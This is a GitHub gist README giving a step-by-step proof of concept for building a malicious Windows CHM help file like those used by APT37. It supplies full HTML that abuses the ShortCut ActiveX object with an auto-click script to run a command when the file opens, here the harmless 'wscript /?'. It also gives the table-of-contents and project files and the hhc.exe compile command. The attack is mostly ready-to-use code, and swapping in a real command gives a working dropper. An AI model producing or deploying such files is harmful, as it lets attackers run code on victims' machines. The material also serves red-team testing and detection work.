Skip to content

Instantly share code, notes, and snippets.

@nasbench

nasbench/README.md

Last active April 12, 2023 12:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nasbench/953c5d34d720c50587e9948ee6d4f1b5 to your computer and use it in GitHub Desktop.
Save nasbench/953c5d34d720c50587e9948ee6d4f1b5 to your computer and use it in GitHub Desktop.
Download ZIP
Malicious CHM Proof of Concept
Raw
README.md

Malicious CHM - Proof of Concept

Here are the steps to follow in order to create a malicious CHM file. As used by APT37

  • Download the HTML Help Workshop (Htmlhelp.exe) from MSDN. If the link is dead you can use the archive version here
  • Once installed you should have a folder C:\Program Files (x86)\HTML Help Workshop and inside the Microsoft HTML Help Compiler (hhc.exe)
  • We need to create 3 files:
    • Project File .hpp
    • HTML File .htm
    • Table of Contents File .hhc

Malicious HTML

This document is using the CLSID {ADB880A6-D8FF-11CF-9377-00AA003B7A11} and the Shortcut command (Read More). It will execute the command wscript with the argument /?.

Note

The CLSID {52A2AAAE-085D-4187-97EA-8C30DB990436} can also be used instead. Read more here

Filename: poc-chm.htm

<HTML>
<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text-html;charset=UTF-8">
</HEAD>
<BODY>
<h2>POC Malicious CHM</h2>
<OBJECT id=poc classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Button" value="Bitmap::shortcut">
    <PARAM name="Item1" value=',wscript,/?'>
    <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
poc.Click();
</SCRIPT>

</BODY>
</HTML>

CHM Table of Contents

The table of contentes references the HTML file created above. The path must be reachable from the current location of the table of content. For example of the HTML file is located inside a folder then the path would be path-to-folder\malicious

Filename: poc-chm.hhc

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD>
<BODY>
<UL>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="Setting up multiple users">
		<param name="Local" value="poc-chm.htm">
		</OBJECT>
</UL>
</BODY>
</HTML>

Project File

The project file references both the "HTML" and the "Table of Contents"

Filename: poc-chm.hpp

[OPTIONS]
Contents file=poc-chm.hhc
[FILES]
poc-chm.htm

Compilation

Once all files are created an placed in a single folder. Execute the following command to compile the CHM and profite.

"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" poc-chm.hpp

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment